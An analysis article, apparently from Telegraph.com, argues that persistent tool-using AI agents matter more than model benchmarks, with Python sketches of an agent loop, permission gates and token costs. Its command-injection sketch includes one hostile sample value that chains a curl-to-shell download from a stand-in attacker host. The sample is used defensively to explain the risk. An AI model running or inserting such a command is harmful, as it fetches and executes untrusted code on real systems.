

The Breakthrough Was Not the Model. It Was the Loop.

Autonomous loop agents are shifting AI from chat to continuous execution. The real change is persistence: systems that watch, plan, act, and repeat inside real tools, with real credentials, over real time. This compresses workflows first, then reshapes jobs, security, and governance as autonomy collides with control.

Artificial intelligence coverage has focused overwhelmingly on which model is smarter, faster, or higher-scoring on benchmarks. That focus now misses the more consequential development. A new class of AI systems is emerging that does not merely respond to prompts but runs continuously, connects to external tools, and executes multi-step workflows with decreasing human supervision. This article explains what those systems are, why they matter, and why they have come to prominence now.

Most readers are familiar with chat-based AI. You type a question, the model replies, and the interaction ends. Autonomous loop agents operate differently. They remain active in the background, observe changes in data or systems, plan actions, execute tasks across software tools, evaluate results, and repeat the cycle. Projects such as OpenClaw, which package frontier language models into always-on, tool-using frameworks, illustrate this architectural shift. The key difference is persistence. The system does not wait for instructions each time. It continues operating.

Imagine a software team that connects an agent to its internal ticketing system, code repository, and testing framework. Instead of asking a chatbot how to fix a bug, the team assigns the ticket to the agent. The system reads the ticket, scans the codebase, proposes a fix, writes the patch, runs the tests, corrects errors, and submits a pull request. A human reviews the change, approves it, and the agent continues monitoring for regressions. The agent is not chatting. It is operating inside a loop: observe, plan, act, evaluate, repeat.
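The observe, plan, act, evaluate cycle described above can be sketched in a few lines of Python. This is a minimal, hypothetical illustration, not OpenClaw's implementation or any vendor's API: `Ticket`, `LoopAgent`, the patch naming and the rule that a first draft fails its tests are invented stand-ins for the model calls, repository access and test runner a real deployment would wire in. A genuinely persistent agent would wait and poll again when its queue is empty; this sketch stops so that it can be run.

```python
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Ticket:
    ticket_id: str
    description: str


@dataclass
class LoopAgent:
    """Hypothetical agent illustrating observe -> plan -> act -> evaluate -> repeat."""

    queue: list[Ticket]
    max_attempts: int = 3
    submitted: list[str] = field(default_factory=list)  # patches sent for human review
    log: list[str] = field(default_factory=list)

    def observe(self) -> Ticket | None:
        # Observe: take the next pending ticket, or None if nothing is waiting.
        return self.queue.pop(0) if self.queue else None

    def plan(self, ticket: Ticket, attempt: int) -> str:
        # Plan: stand-in for a model call that drafts a patch for the ticket.
        return f"patch-{ticket.ticket_id}-v{attempt}"

    def act(self, patch: str) -> bool:
        # Act: stand-in for applying the patch and running the test suite.
        # Invented rule for the demo: every first draft fails, later drafts pass.
        return not patch.endswith("-v1")

    def run(self) -> None:
        # Repeat until the queue is empty (a real agent would wait and poll again).
        while (ticket := self.observe()) is not None:
            for attempt in range(1, self.max_attempts + 1):
                patch = self.plan(ticket, attempt)
                passed = self.act(patch)
                # Evaluate: record the outcome, then either submit or retry.
                self.log.append(f"{ticket.ticket_id}: {patch} {'pass' if passed else 'fail'}")
                if passed:
                    self.submitted.append(patch)  # e.g. open a pull request for review
                    break


agent = LoopAgent(queue=[Ticket("BUG-1", "Login times out"), Ticket("BUG-2", "Wrong VAT total")])
agent.run()
print(agent.submitted)  # ['patch-BUG-1-v2', 'patch-BUG-2-v2']
```

The human stays in the loop at the point where `submitted` is reviewed; nothing in the sketch merges code on its own.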

The decisive shift in artificial intelligence, therefore, is not higher benchmark scores or more fluent chat interfaces. It is the emergence of autonomous loop agents: systems that run continuously, access tools, retain memory, and execute multi-step tasks with decreasing human supervision. The friction point is no longer capability alone. It is security, governance, and infrastructure.

Most public discussion still focuses on model intelligence. Yet the real structural change is persistence. A traditional chatbot waits for a prompt. An autonomous loop agent does not. It monitors, plans, acts, evaluates, and repeats. It can run overnight. It can integrate with ticketing systems, development pipelines, and internal dashboards. It moves from responding to instructions to executing workflows.

Coding is the first domain to feel this shift. Software development is structured, feedback cycles are short, and tool integration is straightforward. AI-assisted coding is now embedded in mainstream development stacks. Enterprises report dramatic productivity shifts, although precise internal metrics are rarely published. The more consequential change is not autocomplete but multi-step agents that generate, test, refactor, and redeploy code in iterative loops. Junior roles are being redesigned first, while oversight functions are, for now, gaining value. Replacement is not yet wholesale, but workflow compression is real.

Before loop agents, a developer might spend a full day triaging logs, identifying a bug, writing a fix, running tests, adjusting the patch, and documenting the change. With a persistent agent connected to logs and version control, much of that cycle can run automatically. The human role shifts from performing each step to supervising the system’s output and approving critical changes. The elapsed time may shrink from a full day to a matter of hours. The nature of the job changes even if the job itself does not disappear.

Autonomy, however, inverts the security equation. The risk is no longer that a model produces incorrect text. It is that an agent executes incorrect or malicious actions. Security researchers have documented remote code execution vulnerabilities and command injection pathways in agent ecosystems. Malicious skills have been discovered in public marketplaces. In multiple cases, users exposed control panels to the public internet without adequate authentication. The combination of continuous runtime, credential storage, and tool execution expands the attack surface significantly.
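Command injection in this setting usually means text the agent did not author, such as a ticket body or a web page, ending up inside a shell command. A minimal Python sketch of the pattern and of one common mitigation follows, assuming a hypothetical allowlist of `git` subcommands; `unsafe_command`, `safe_argv` and `ALLOWED` are illustrative names, not part of any agent framework. Passing an argument list to `subprocess.run` with the default `shell=False` keeps shell metacharacters from being interpreted, although it does not by itself stop a tool from misreading a hostile argument, such as one beginning with `--`.

```python
# Hypothetical allowlist: the only tool and subcommands this agent may invoke.
ALLOWED = {"git": {"status", "diff", "log"}}


def unsafe_command(ticket_text: str) -> str:
    # Anti-pattern: untrusted text spliced into a string that a shell will parse.
    # If ticket_text contains "; curl ... | sh", a shell would run a second command.
    return f"git log --grep={ticket_text}"


def safe_argv(tool: str, subcommand: str, *args: str) -> list[str]:
    # Refuse anything outside the allowlist before it reaches a process.
    if subcommand not in ALLOWED.get(tool, set()):
        raise PermissionError(f"{tool} {subcommand} is not allowlisted")
    # Suitable for subprocess.run(argv) with the default shell=False: each element
    # is passed to the program as one argument, so ";" and "|" are plain characters.
    return [tool, subcommand, *args]


hostile = "fix; curl https://attacker.example/x | sh"
print(unsafe_command(hostile))
print(safe_argv("git", "log", f"--grep={hostile}"))
```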

This is not dystopian speculation. It is a familiar pattern in new computing paradigms. Browser extensions became malware vectors. Package managers became supply chain targets. Autonomous loop agents combine both characteristics while holding API keys, bot tokens, and infrastructure credentials. The blast radius is larger because the authority granted to these systems is larger.

Enterprises are responding cautiously. Production deployments are typically sandboxed, isolated in virtual private networks, constrained by permission budgets, and instrumented with audit logs. Destructive actions often require human approval. The repeated approval friction is not inefficiency. It is governance stabilising around a new capability. Over time, as confidence increases, some approval gates may be relaxed. Full unsupervised autonomy, however, remains institutionally throttled.
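The controls listed above, a permission budget, a human approval gate for destructive actions and an audit log, can be combined in a single checkpoint that every tool call passes through. The sketch below is hypothetical: the action names, the budget semantics (one unit per allowed action, refusals cost nothing) and the `approve` callback are assumptions, not any product's configuration.

```python
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Callable

# Hypothetical set of actions that always need a human sign-off.
DESTRUCTIVE = {"delete_branch", "drop_table", "deploy_production"}


@dataclass
class Gatekeeper:
    budget: int  # permission budget: how many actions this run may still take
    approve: Callable[[str], bool]  # asks a human; True means approved
    audit_log: list[tuple[str, str]] = field(default_factory=list)

    def request(self, action: str) -> bool:
        # Every decision, allowed or denied, is written to the audit log.
        if self.budget <= 0:
            self.audit_log.append((action, "denied: budget exhausted"))
            return False
        if action in DESTRUCTIVE and not self.approve(action):
            self.audit_log.append((action, "denied: approval refused"))
            return False
        self.budget -= 1
        self.audit_log.append((action, "allowed"))
        return True


# A reviewer who refuses every destructive action, and a budget of two actions.
gate = Gatekeeper(budget=2, approve=lambda action: False)
for action in ["run_tests", "drop_table", "open_pull_request", "run_tests"]:
    gate.request(action)
for entry in gate.audit_log:
    print(entry)
```

Relaxing an approval gate, as the paragraph anticipates, would amount to shrinking `DESTRUCTIVE` or raising `budget`; the audit log is what makes that relaxation reviewable after the fact.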

In parallel, payment providers are exploring how agents might transact. Major incumbents have signalled interest in enabling AI-driven payments under constrained conditions. The infrastructure is forming, but liability questions remain unresolved. If an autonomous agent causes a financial loss, it is unclear who is responsible: the operator, the vendor, the hosting provider, and the tool marketplace could each bear part of it. Until this is clarified, deployment will likely remain limited to controlled environments.

Infrastructure imposes a second constraint. Data centre expansion plans now measure capacity in gigawatts. Energy regulators are scrutinising grid load forecasts and cost allocation mechanisms. Autonomous loops increase compute consumption because they multiply token usage over time. Persistent agents burn resources continuously. The model race therefore collides with power generation, interconnection queues, and chip supply. Intelligence scaling is bounded by physical and political limits.
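The claim that loops multiply token usage is simple arithmetic: daily consumption is cycles per hour × tokens per cycle × hours active, and a persistent agent keeps all three terms high. The figures below are invented for illustration, not measurements from any deployment.

```python
def daily_tokens(cycles_per_hour: float, tokens_per_cycle: int, hours_active: float) -> float:
    """Tokens consumed per day by a loop running a fixed number of cycles per hour."""
    return cycles_per_hour * tokens_per_cycle * hours_active


# Hypothetical chat user: 20 prompts a day at roughly 2,000 tokens each.
chat = 20 * 2_000

# Hypothetical persistent agent: one cycle every 5 minutes, 8,000 tokens per cycle
# (re-reading context, planning, tool output, evaluation), running around the clock.
agent = daily_tokens(cycles_per_hour=12, tokens_per_cycle=8_000, hours_active=24)

print(f"chat:  {chat:,} tokens/day")
print(f"agent: {agent:,} tokens/day ({agent / chat:.1f}x the chat user)")
# chat:  40,000 tokens/day
# agent: 2,304,000 tokens/day (57.6x the chat user)
```

Because the product is multiplicative, halving the cycle interval doubles consumption, which is why polling frequency becomes a cost and energy question rather than a purely technical one.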

The next twelve to twenty-four months are unlikely to produce fully autonomous corporate systems acting without oversight. They are likely to produce incremental expansion of agentic tooling inside controlled environments, accompanied by more security incidents, tighter sandboxing practices, and ongoing infrastructure build-out. Labour effects will manifest first as workflow redesign and entry-level role compression rather than sudden macroeconomic shock.

The breakthrough, in other words, was not a higher IQ model. It was persistence. Persistence changes productivity. It changes risk. It changes governance. The contest ahead is not simply model versus model. It is autonomy versus control.

You might also like to read on Telegraph.com

- OpenClaw, Moltbook, and the Legal Vacuum at the Heart of Agentic AI
  An examination of accountability gaps emerging around autonomous agents.

- AI Is Making Cognition Cheap Faster Than Institutions Can Cope
  Why falling AI costs are outpacing governance and institutional capacity.

- AI Is Raising Productivity. Britain’s Economy Is Absorbing the Gains
  Measured productivity effects and how they diffuse through the economy.

- The Jarvis Layer and the Most Dangerous AI
  How proximity and persistence change the risk profile of AI systems.

- China Is Not Trying to Beat Western AI. It Is Trying to Replace the Interface
  A structural analysis of China’s AI distribution strategy.

- AI Driven Data Centre Growth Is Colliding With Transformer Shortages
  Infrastructure constraints shaping AI expansion.

- AI Is Breaking the University Monopoly on Science
  How AI shifts discovery outside traditional academic institutions.

- AI Is Reordering the Labour Market Faster Than Education Can Adapt
  Structural labour market implications of rapid automation.

- The Compute Detente: Why Big Tech Is Buying Everyone
  Compute scarcity, consolidation, and strategic competition.

- Elon Musk Moves xAI Into SpaceX as Power Becomes the Binding Constraint on Artificial Intelligence
  Why energy and infrastructure now define AI limits.